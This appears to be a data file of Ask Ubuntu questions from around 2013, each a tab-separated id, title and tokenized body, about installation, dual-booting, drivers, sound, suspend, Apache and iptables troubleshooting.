310795	replace ubuntu with windows 7	i am running ubuntu 13.04 right now and i would like to go back to windows . i have a windows 7 iso and tried booting it from the usb but it brought up a command screen and i had no idea what to do there . what i am trying to do is basically uninstall ubuntu and install windows back on my laptop
310796	how do i fix a dark screen on hp folio 13 ?	i am running ubuntu 12.10 . someone can explain me how to do to see in my notebook , because works perfectly but has a lighted display , i love ubuntu and i use it on my notebook , thanks . this is an automated translation from the original question in spanish .
310800	what causes dell xps 13 projectsputnik to wake up randomly after suspend and how to fix it ?	when i close the lid of my xps13 the system goes to sleep regularly . sometimes it stays asleep but some other times it wakes up consuming battery . i ca n't find the reason why this is happening . here are the recent logs : from pm-suspend.log thu jun 20 08:59:47 pdt 2013 : performing suspend thu jun 20 11:00:18 pdt 2013 : awake . thu jun 20 11:00:18 pdt 2013 : running hooks for resume from syslog at the same time : jun 20 08:59:47 sputacchio kernel : [ 28423.044067 ] psmouse serio1 : trackpad at is a0060/serio1/input0 lost sync at byte 1 jun 20 08:59:47 sputacchio kernel : [ 28423.045743 ] psmouse serio1 : trackpad at is a0060/serio1/input0 - driver resynced . jun 20 11:00:18 sputacchio acpid : client 1669 [ 0:0 ] has disconnected jun 20 11:00:18 sputacchio kernel : [ 28423.074982 ] psmouse serio1 : trackpad at is a0060/serio1/input0 lost sync at byte 1 running stock kernel # uname -a linux sputacchio 3.8.0-25-generic # 37-ubuntu smp thu jun 6 20:47:07 utc 2013 x86_64 x86_64 x86_64 gnu/linux i disabled smart connect in the bios but the laptop resumed last night without a reason ( lid closed , sitting on the desk ) wed jun 26 00:12:46 cest 2013 : performing suspend wed jun 26 01:53:10 cest 2013 : awake . wed jun 26 01:53:10 cest 2013 : running hooks for resume strangely there is no sign of activity on syslog around that time , so i 'm assuming whatever wakes the system up is not the kernel . i have also disabled intel smart start technology ... any other clues on things to disable ?
310803	open foo.r executable files in gedit	i 'm editing a bunch of foo.r files ( source r files for an r packages ) in ubuntu unity 12.10 . every time i click on one of these files to open it in gedit , a dialogue box comes up : `` do you want to run foo.r , or display its contents ? '' and then i have to click on a `` display '' tab . can i make it open automatically in gedit ? note that gedit is already set as the default open-with program .
310807	misaligned buttons ?	i have been installed ubuntu-gnome package , then modifying the unity themes , and that button is misaligned now . before after what should i do ? note i 'm using 13.04 .
310808	gvim warning : libdbusmenu-glib-warning	in gvim , if i do gvim . it uses netrw to show directory structure . then if i open a file and then , without editting , do : e and then open the file again i get , libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . i have n't noticed any effect in functionality of gvim , it just annoying to see the warning , how can i fix this or less preferably hide the error ?
310810	can i use the power button to shut down my computer gracefully on ubuntu minimal ?	i am looking for a way to get my computer to automatically shutdown when i press the power button . i have installed ubuntu 12.10 minimal . a similar question is asked here . however , with ubuntu minimal , i do not have the /etc/acpi/ directory , most likely because acpi does not come installed by default ? is there a way to shutdown the computer nicely via the power button without the use of acpi ? or do i have no choice but to install it ?
310812	last couple of fglrx drivers on ubuntu 12.04 have backlight support broken	i 've been keeping up with latest fglrx releases on amd 's website and it appears that both the last stable ( 13.4 ) and beta ( 13.6 ) drivers have brightness broken in ubuntu 12.04 with all the latest updates . hardware/software configuration is hp dm1 4000 series laptop ( more specifically dm1-4142nr ) with an amd6320 apu running 64-bit version of ubuntu 12.04 . all display options and desktop features work just fine . pressing hardware brightness keys brings up unity 's pop-up brightness bar which changes accordingly but there are no changes to the actual backlight brightness . doing echo 5 > /sys/class/backlight/acpi_video0/brightness as root does nothing either even though the actual number sticks and both brightness and actual_brightness reflect the newly echoed number ( any other number does the same ) . trying to boot the kernel with acpi_backlight=vendor flag has no effect . neither does adding the following in the xorg.conf ( under section `` device '' ) : option `` registrydwords '' `` enablebrightnesscontrol=1 '' adjusting brightness within the amdccle tool changes brightness by adjusting colors but does not change the actual backlight amount ( or at least it does not appear to ) . there are no other options pertaining to brightness that i could find . at this point i am all but out of ideas as it seems this is clearly driver 's fault . is there a way to figure out where in the driver source is the regression so that one can at least revert that part and build a fully working driver with latest improvements ? edit : further clarifications and additional questions i also tried 12.100 , 12.104 , and 13.101 and none of them work in terms of brightness . diff between 9.012 sources ( that work but have other 3d bugs ) and 12 and newer branches shows only versioning difference so it appears that brightness control is buried within the binary blob . using acpi_os_name= '' windows 2009 '' acpi_osi= '' windows 2009 '' ironically enables brightness adjustments until you enter the x part of the boot sequence at which point it stops working . at this point , i am wondering if anyone else has backlight working on these newer drivers and what their kernel boot options are . sept. 8th update : tried 8/19/2013 driver and no change -- if anything manual spam of brightness change reported on one of the forums works even more sporadically . i guess i am wondering at this point if this is possibly a kernel issue and if so , do any of the users of newer versions of ubuntu ( 12.10 , 13.04 , etc . ) have the same issue ? jan. 12th , 2014 update : as indicated in comments below , all versions released since still have n't fixed this problem . the most recent stable release ( 13.12 ) and its predecessor enable brightness changing until one suspends the computer and upon resuming brightness adjustment stops working until either computer or x server is restarted . i also just tried latest beta which apparently is misnumbered ( 13.11-betav9.95 released on 01/08/2014 ) , and the same problem persists ... got ta love amd driver support ... update jan 20 , 2014 : version 13.30.rc3 ( beta ) same problem ... i have a nagging suspicion that the amd team does not have anyone competent to tackle linux issues like problems of reliable suspend/resume or the aforesaid brightness regression , both of which have existed for ages and instead they just backport basic things from the windows driver to make it `` work '' with the new hardware . this is definitely the last amd investment i will ever make ... update feb. 3 , 2014 : 14.1 beta is released and it lists fixing brightness on the ubuntu 12.04 as one of its bugfixes . this however is not the case , and the brightness stops functioning after resume . update mar . 22 , 2014 : 14.2 and 14.3 betas make no improvement on this either .
310815	installing ubuntu on my laptop	i am using a sony vaio sve15113en ( e series ) laptop with i3-2370m cpu @ 2.40ghz ( 64bit processor ) and 2 gb ram . i am also running win 7 pro . i am planning a dual boot . could you please tell me which version of ubuntu should i choose ? all and any help would be most appreciated . thank you in advance for your replies .
310817	url rewrite does not work ubuntu server	currently i am working with a php script but it still contains an unfriendly link ( cms.php ? cms=login ) . i want to turn it into a friendly link /cms/login i have an .htaccess file is created rewriteengine on rewriterule ^cms/ ( [ ^/ ] * ) $ /cms.php ? cms= $ 1 [ l ] but when in now go to the page i see this : my /etc/apache2/sites-available/default file : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > also did this : sudo a2enmod rewrite sudo service apache2 reload rewrite.load file : loadmodule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so i looked on much forums but i can not find it . ubuntu server works on openvz ( ubuntu 12.10 ) where is the fault ? what should i do ?
310819	custom icon has odd border svg ?	i got the default folder .svg from my os and edited it to add a paintbrush for my artwork folder and i place in in a separate icons folder saved as an .svg when i look at it in the folder it has a odd background/border . even though it has neither . here 's a link a screen shot of the image . i created it with inkscape from the original folder icon located in /usr/share/icons/humanity/places/48/folder.svg if you look at the artwork icon in the home/pictures folder on the left it has that border . compared to the default just below it . the svg ( right top , displayed bellow showing transparency ) . i want to get rid of that border
310820	ubuntu 12.04 and windows 7 dual partition . extending ubuntu memory	previously , i have installed windows 7 and ubuntu 12.04 as dual boot on my 320 gb laptop . i have three partitions . 200 gb - window 's 7 is installed in it . 100 gb - ntfs partition its name is ( new volume ) where currently i am storing movies/music etc . 20 gb - ubuntu 12.04 . i can access 100 gb ( new volume ) both in windows and ubuntu 12.04 . i am running out of ubuntu memory . how can i extend/increase it as i have 100 gb ( unused ) memory ? can i make use of that and make my ubuntu 120 gb ? what should i be doing ? i have installed gparted but it can not extend my 20 gb ubuntu memory to 120 gb i guess .
310824	upgrade ubuntu 12.04 to 13	i am having trouble upgrading to the latest version of ubuntu . i have checked the application manager and it will not show the upgrade . should i just download the latest version and install it rather than trying to upgrade . thanks
310835	no sound on a dell dimension 8300	maybe i 'm just doing something wrong , but i 've tried trouble the troubleshooting guides . i still can not get any sound to work . i 'm trying to use the creative labs card . i will settle for any working sound . 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 ) subsystem : dell device 0157 flags : bus master , medium devsel , latency 0 , irq 17 i/o ports at ee00 [ size=256 ] i/o ports at edc0 [ size=64 ] memory at febffa00 ( 32-bit , non-prefetchable ) [ size=512 ] memory at febff900 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > -- 02:02.0 multimedia audio controller : creative labs sb audigy ( rev 04 ) subsystem : creative labs device 1003 flags : bus master , medium devsel , latency 64 , irq 17 i/o ports at df00 [ size=64 ] capabilities : < access denied > kernel driver in use : snd_emu10k1 kernel modules : snd-emu10k1
310843	( solved ) huge loss of memory from usb boot . any help ?	i have successfully installed ubuntu 13 on my laptop using an 4gb usb drive with a bootable .iso however i went to try and format the usb on my desktop ( windows 7 : ( ) and now it only has 700mb is there any way to get my 4gbs back , or have i lost it forever ? edit : 21/06/13 thanks guys , got my usb back
310850	error installing ubuntu 12.04 on windows 7	evebody ... today , i want to install ubuntu 12.04 x64 in my asus x45a notebook . i prefer x64 cuz in the notebok 's driver cd , it say 's `` support with windows 7 64 bit only ! '' and i'am afraid something wo n't work if i installed the x32 os . and when i installing the ubuntu directly from windows 7 ( i ca n't boot into pendrive cuz my netebook does n't recognize it , help needed too ) i got this error message > > `` could not retrieve the required disk image files '' and here is the wubi error log > > http : //paste.ubuntu.com/5785429/ i 'm new to ubuntu.. so please , help me ... i 'm planning to use ubuntu cuz it 's easier to developing android apps ... whoever wants to help me , i really appreciate that : )
310851	install ubuntu ca n't see my second hard drive	when installing ubuntu 13.04 desktop , it does n't show my second hard drive as an installation option . i am trying to install ubuntu alongside windows 7 on another hard drive . windows 7 sees my second drive fine , and it is also listed in the bios . another strange thing is that install ubuntu sees my first drive ( the one i have windows 7 on ) fine , but is says `` no operating system detected '' . please help !
310853	how to hide the `` broadcast from root @ ... the system is going down for system halt now ! ''	i 'm now trying to hide all the messages or verbose when using a ubuntu server+openbox , and now there 's only one left -- `` the system is going down for system halt now ! `` . it 's kind of like a wall , so i chmod 000 wall but it does n't work . does anyone know how to hide or disable it ? ubuntu server 12.04 lts + openbox + plymouth theme
310860	want to replace one ubuntu with another	wireless wont work with ubuntu 12.04 on a dell netbook , want to try 13.04 but i do n't see an exe or w/e on flash drive . what do i select in `` pendrive '' to install new ubuntu distro ? i already put 13.04 on flash drive successfully .
310861	3d support on amd radeon hd 7800m series video card with 3 displays ( dell m6700 )	on my dell m6700 laptop with an amd radeon hd 7870m video card i am unable to get 3d support with 3 displays on ubuntu 12.04.02 ( lts ) with the open source radeon driver i can get 3 displays working but no unity 3d support . with the proprietary drivers , event the latest 13.4 directly from amd , i can get 2 displays working , but if i add a third , i get various crtc errors . going to xrandr , these errors seem to be associated with enabling crtc 2 . ie : $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati device [ 1002:6825 ] $ xrandr -- verbose -- fb 6016x1152 -- output lvds -- auto -- output dfp5 -- auto -- right-of lvds -- output dfp9 -- auto -- right-of dfp5 screen 0 : 6016x1152 1592x305 mm 95.94dpi crtc 0 : 2048x1152 59.9 +1920+0 `` dfp5 '' crtc 1 : 2048x1152 59.9 +3968+0 `` dfp9 '' crtc 2 : 1920x1080 60.0 +0+0 `` lvds '' xrandr : configure crtc 2 failed crtc 0 : disable crtc 1 : disable crtc 2 : disable crtc 3 : disable crtc 4 : disable crtc 5 : disable screen 0 : revert crtc 0 : revert crtc 1 : revert crtc 2 : revert crtc 3 : revert crtc 4 : revert crtc 5 : revert $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7800m series opengl version string : 4.2.12217 compatibility profile context firegl 12.104 everything i read says it should be possible with this version of the catalyst drivers ( currently 13.4 ) and linux . and the card supports eyefinity . ( 6 displays ) i 've tried various outputs with display-port and not , and still no luck . does anyone know if a newer version of the radeon driver supports 3d on this card ? or if there is some way to enable crtc 2 in the fglrx driver for without getting the configuration error ? when i use amdcccle to configure 3 or more monitors it ends up giving a generic not enough memory or unable to enable display error . i think this is directly related to the xrandr : configure crtc 2 failed . depending on the configuration i get many different crtc errors on bootup . 147,148,149 seem the most common . current xrandr -q shows the following $ xrandr-q screen 0 : minimum 320 x 200 , current 4096 x 1152 , maximum 6016 x 2048 lvds connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + ... dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 connected 2048x1152+0+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 2048x1152 59.9*+ ... dfp6 disconnected ( normal left inverted right x axis y axis ) dfp7 disconnected ( normal left inverted right x axis y axis ) dfp8 disconnected ( normal left inverted right x axis y axis ) dfp9 connected 2048x1152+2048+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 2048x1152 59.9*+ ... dfp10 disconnected ( normal left inverted right x axis y axis ) dfp11 disconnected ( normal left inverted right x axis y axis ) dfp12 disconnected ( normal left inverted right x axis y axis ) crt1 disconnected ( normal left inverted right x axis y axis ) this basically confirms my virtual screen size is large enough , and the displays are available .
310864	ubuntu 12.10 displaylink adapter no green screen	i initially wanted to get this working on 13.04 , but have since given up . if i get it working on 12.10 , i may decide to upgrade , but that 's irrelevant until such a time . unlike many reported cases of the combination of ubuntu and the adapter not working , mine does not display anything on the monitor , least of all green . after a few days of frustrating searching , and failed attempts to build xserver-xorg-video-displaylink after discovering it is n't available from the repository anymore , i stumbled across bug 812594 on launchpad for xserver-xorg-video-displaylink . while the title was not encouraging , i looked through the comments anyway , and discovered damiön 's comment regarding canonical paid support . the included readme was highly illuminating , and decided to look at the attr { name } entry from udevadm info -- attribute-walk -- path= $ ( udevadm info -- query=path -- name=/dev/fb1 ) . surprisingly , it returned `` udldrmfb , '' not an identifier i 'd found before . a quick search came up with a number of bugs concerning edid extension blocks , which matched with my vague understanding from the read-edid package output . that 's about as far as i 've gotten , and i 'm rather stumped . how can i get this adapter working ?
310866	how to make ubuntu alt+tab smarter ?	alt+tab is frequently used to switch windows under which a user is working parallel . but the more i use alt+tab under ubuntu , the less i feel ubuntu is smart . for example , when i am working in window a , i want to switch to window b , but most of the time ubuntu switch to another window c that i do n't want to go to . the question i want to ask is , is there a tool that can make alt+tab behaviour smarter ? my basic idea to make alt+tab smarter is that , the switching process can be modelled as a markov process . that is using p_ij to represent the probability of switching from window i to window j . this matrix can be updated while i am working . a smarter alt+tab should be able to guess which window i want to go to according to this matrix . however , i am idiot on programming to change this behaviour . can you do it ?
310867	kde desktop returns to login on opening application	so , i was n't using linux for awhile ( i was playing a lot of non-linux games ) and came back to linux once i started getting back into my development work . i rebooted my computer , and everything started up ok . i logged in , tried to open konsole and found myself back at the login screen . i proceeded to try the kde menu , also back to login screen . after either of these scenarios , i could not restart from the login window , but had to use a tty and sudo reboot . i should note , i could open firefox , dolphin and show the plasma widgets for networking , but anything else that i got to try failed . i wish i could give a bit more information , but here is going off what i know : hardware : nvidia card running proprietary drivers ( dual monitor setup , gtx 460 fermi ) amd cpu using wired internet through motherboard linksys wireless card installed , although not used software : kubuntu 13.04 installed all packages are up-to-date , standard install + steam , few games , and c++ developer tools kernel upgrade failed to the most recent update , not sure why kubuntu-backports repository is installed for most recent qt version ( needed for projects ) procedures tried : restarting the computer , multiple times regenerating xorg.conf through nvidia-settings removing ~/.kde to bring it all back to stock installing newest edition of kscreen , that made the least changes of all of them.. i 'd really like to avoid a complete reinstall as getting back custom settings is annoying , and downloading all the software is a bit of a load on my network ( there 's about 75gb of softwares i 'd have to redownload ) . any help is appreciated !
310884	hdd and ssd configuration	i had just bought a system76 laptop that is preinstalled with ubuntu 13.04 , and has a nice ssd and hdd setup . the problem is that the laptop 's hdd comes unpartioned and unformatted , while the entire filesytem lives on the ssd . it is a very high-end laptop , and god forbid that anything happens to the ssd . every article i look up in my research says that you must be going on a safari in your fstab and partitioning your ssd and hdd for certain file directories . in short , i have to ask , is it okay to just mount the /home directory in the hdd , while the rest of the file system lives in the ssd ? does it really make a difference if you 're coming from a 2011 macbook pro with a 5400 rpm hard drive , or if the ssd tech is fairly modern ? my ssd specs are : 120 gb intel 525 series msata ssd , and my hdd specs are : 500 gb 7200 rpm sata ii thank you in advance !
310885	kernel dump using linux-crashdump under vmware ?	i 've followed the directions here for my 12.04.2 ubuntu server running in vmware fusion 5 , and everything looks good , so i do a echo c > /proc/sysrq-trigger as root . it panics the kernel as expected , and then hangs after printing out a bunch of stack traces . i waited a few minutes to make sure any writes to disk ( for the crash dump ) finished , and i restarted the vm . when i log in again , ls /var/crash shows no files ! any idea how to get it to work , or whether it works at all ?
310889	accessing console for vmware ubuntu machine	how can i access an ubuntu server 12.04.2 's console if it 's running inside a vmware fusion 5 vm ? i 've tried following various guides online but when i run screen on the tty used by socat -d -d /tmp/serial0 pty , nothing ever shows up .
310891	back to login screen when using xubuntu desktop	i 've installed lot of de 's , including xubuntu-desktop . then i decided to uninstall all except xubuntu-desktop . now , when i login to ubuntu using either xfce or xubuntu session , a few seconds after showing the desktop , i 'm returned to the login screen automatically . specifications : ubuntu 12.10 using wubi acer aspire v5-471 intel hd graphics 3000 enabled composite in xfce ( not with compiz ) edit : last thing i done in xfce session before that thing happens is adds item in panel and modifying it 's original menu . edit 2 : removing unneeded packages solves my problem , but when changing themes it went back again to lightdm . edit 3 : just logged again , and back again to lightdm with some startup programs like xterm , java and screenlets . what should i do ?
310892	ubuntu 12.04 hangs at `` where are you ? '' during install	i am trying to dual-boot a brand-spanking new rebuilt computer . i bought ( 2 ) 128gb samsung 840 pro ssds with the intent of installing windows 8 ( new ) on one and ubuntu on the other ... with a 500gb hdd for data storage . the windows 8 install went super smooth ... but ubuntu is giving me fits . my previous machine also was a dual-boot ( windows xp on one 250gb hd and ubuntu on another ) , so i 'm relatively familiar with dual-booting a machine from 2005 ... can not figure out what 's causing the problem here . so i downloaded the ubuntu-12.04.2-desktop-amd64.iso file and wrote it to a blank dvd ( using windows 8 ) . i also created a bootable usb drive of the same image . i have tried both , but am having similar problems . the boot disk will allow me to start the install but it hangs on the `` where are you ? '' screen . the clock cursor still moves , and i can click on the map to highlight different areas ... but as much as i click `` continue '' , nothing happens . i have also booted into the desktop using `` try ubuntu without installing '' , and tried to install from there ... install stalls out at the same place , with the clock spinning . i can , however , still navigate on the desktop and use the internet , etc . a couple items that may or may not be of importance : i am using the uefi install option from my bios to get this far . i 'm not sure that i understand the whole uefi thing ( being stuck back in 2005 ) , but i think that it makes sense because i 'm trying to dual-boot with windows 8 . i am using the `` something else '' option from the ubuntu installer , as i did n't want the `` install along side windows 8 '' option to automatically throw ubuntu on the same ssd as windows . i partitioned the 128gb ubuntu ssd as follows : /boot = 500mb / = 15gb /home = 108gb swap = the rest ( a bit over 4gb ) some detail of my new system : amd a10-6800 quad-core processor asrock fm2a85x extreme6 mobo 8gb ram ( 2 ) 128gb samsung 840 pro ssds ... with windows 8 installed on one ( 1 ) 500gb hd - data drive from my old installation . not bootable . i 'm not sure what other info i can provide that would be helpful . i 'd be very appreciative of whatever help y'all can offer ... and will answer what questions i can . erin
310893	run adobe cs6 from win7 install in dual-boot ?	i 've got a windows machine and recently decided to add a second hard drive with xubuntu to run a dual-boot setup . i already have adobe master collection cs 6 installed on my windows hd . is there a way for me to run cs 6 applications in xubuntu , from where they currently reside on the other hd ? the entire win7 hd is accessible to browse in xubuntu .
310899	ubuntu 13.04 running slow	i have recently installed ubuntu 13.04 to get away from windows 8 ( i never liked windows ) . but since i have installed ubuntu 13.04 it has been very slow , such as opening or searching for a files . my specifications are : amd dual-core processor e1-1200 , 4gb ddr3 memory , 500gb hdd , i do n't know how many hertz it has
310904	is there an easier way to add cjk support to kile ?	i am new to kile and latex and have already installed kile and tex live 2012 on ubuntu 12.04-lts ( 64bits ) . i feel like adding chinese support following procedure provided by this website using cjk : cjk support . however , i am stuck at step 5 , because i could not find the command ttf2pfb anywhere , though i have googled a long time . i also want to install several adobe fonts such as - adobefangsongstd-regular ( v5.010 ) .otf - adobekaitistd-regular ( v5.010 ) .otf - adobeheitistd-regular.otf - adobesongstd-light.otf . hence i have two questions : is there an easier way to add chinese support , if not , where i can find ttf2pfb ? where i should place those adobe fonts and how to let kile and latex recognize them and how to use this fonts ? i am going to appreciate it very much if there are some suggestions . and the more specific , the better .
310910	what is `` yourdomainname.ca-bundle '' ?	for installing ssl certificate on ubuntu i have to insert these lines on virtualhost block : sslengine on sslcertificatekeyfile /etc/ssl/ssl.key/server.key sslcertificatefile /etc/ssl/ssl.crt/yourdomainname.crt sslcacertificatefile /etc/ssl/ssl.crt/yourdomainname.ca-bundle but i do n't understand what the forth line does ?
310914	no audio sound , dummy output the only option in sound configurations	i have no audio sound , neither in speaker nor in headphones , i used to work on 12.10 but after this problem started i upgraded to 13.04 in hope that it may be solved , but it did n't . when i open sound configurations , the only option listed there is dummy output , so i ca n't change it to any other option . i have already tried speech dispather and many other forums in here but none seem to work , please help me out as i am without audio here . 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119m [ geforce 610m ] ( rev a1 ) 03:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 04:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 0a ) these are the details of the error for package operation failed perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package dkms . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 180940 files and directories currently installed . ) unpacking dkms ( from ... /dkms_2.2.0.3-1.1ubuntu2_all.deb ) ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up dkms ( 2.2.0.3-1.1ubuntu2 ) ... selecting previously unselected package oem-audio-hda-daily-dkms . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 180987 files and directories currently installed . ) unpacking oem-audio-hda-daily-dkms ( from ... /oem-audio-hda-daily-dkms_0.201306201243~quantal1_all.deb ) ... setting up oem-audio-hda-daily-dkms ( 0.201306201243~quantal1 ) ... loading new oem-audio-hda-daily-0.201306201243~quantal1 dkms files ... first installation : checking all kernels ... building only for 3.8.0-25-generic building for architecture x86_64 building initial module for 3.8.0-25-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dpkg : error processing oem-audio-hda-daily-dkms ( -- install ) : subprocess installed post-installation script returned error exit status 9
310918	mobile broadband connection ( dongle ) needs to be added again on every boot	using a mobile broadband connection ( dongle , tata photon+/huawei ) . i add the connection and it works fne but only till next reboot . on rebooting again the connection settings disappear and i need to add again . not a huge issue but inconvenient . possible to save the settings and connect permanently on a click ?
310919	ubuntu 12.04 lts wubi installation	i have just ( finally ) installed ubuntu 12.04 lts on my acer aspire one netbook , using wubi . i have tried to install with a usb stick many times , but failed . so , now i have a dual boot with ubuntu and windows 7 . but i want to completely remove windows 7 , just to stay with my ubuntu only . i have an internet wifi connection , but i can not use a usb stick or dvd .
310925	how can i set up a build target in qt creator to compile for 32 bit on 64 bit ubuntu ?	i am running 64 bit ( x86 ) ubuntu and would like to be able to build qt projects for a target architecture of 32 bit ( x86 ) . qt creator allows the configuration of multiple 'build kits ' for compilation for different targets . when creating a build kit i am able to select a 32 bit compiler `` gcc ( x86 32bit ) '' but this seems to conflict with the installed 64 bit qt libraries . how do i install the 32 bit libraries and configure qt creator to build 32 bit executables ?
310926	iptables help needed in 1304	i 've setup my raring-ringtail machine and decided to use iptables after removing ufw to have more control over my network security . however , i 'm stuck at one point . first , i 've set default policy to deny all traffic by default : iptables -p input drop iptables -p output drop iptables -p forward drop after that , i 've added accept rules for my local network interfaces , which work fine . however , in order for some of my local services ( such as web-server local browsing ) to work , i need to allow traffic originating to/from my local interface ( lo ) . for this , i 've found two versions on the net : [ 1 ] iptables -a input -i lo -j accept # allow local addresses iptables -a output -o lo -j accept # allow local addresses [ 2 ] iptables -a input -s 127.0.0.1 -j accept # allow allow local addresses iptables -a output -d 127.0.0.1 -j accept # allow allow local addresses i want to know whats the difference between the two ? is allowing traffic to/from the `` lo '' interface same as originating/destined-to 127.0.0.1 ? which one should i use and why ?
310930	localhost wont load	i 'm running nagios 3.5.0 with apache2 and i just put in the check_mk add-on . it was working perfectly until i tried to implement a thruk installation followed by a mod_python patch ( in that order ) . both installations did n't complete successfully so i attempted a delete and reinstall . now my localhost wo n't load in the browser . the browser just says it is connecting but nothing loads on the screen . the error log reads '' child pid 4027 exit signal segmentation fault ( 11 ) `` any help is greatly appreciated .
310932	newest flash problem	i am using `` newest '' flash for ubuntu that is 11.2.202.291 , but i 'm experiencing problems running some flash games/players checking up for newest flash that is currently 11.7.700.224 for windoes . it just says i need to update my flash . is there any way to skip/lie that i have newest flash installed to run it ? im using ubuntu 13.04 ; 3.8.0-25-generic ( 64-bit ) if that may help in answer somehow .
310933	how to install d-link dwm-156 3g modem ubuntu 13.04	i bought a new d-link 3g modem and it said it supports linux . but after i installed it , i still ca n't make the device work on ubuntu 13.10 . i used the .deb file from the d-link modem 3g_modem_connect_dwm156_amd64.deb ( from the modem itself ) but i was unable to configure it . i searched the internet , they use dlinkusbmodem.deb file , which is a file from 1 year ago . even after i dpkg it , i still do n't know how to proceed . i 've used every method in the askubuntu , it do n't work with this file version .
310939	if i uninstall windows will ubuntu be uninstalled ?	i have a problem with my windows xp sp3 , it shows blue screen in normal mode and in safe mode ( both ) . so , i decided to uninstall windows xp sp3 and re-install again . but i am confused . will it uninstall ubuntu or not ?
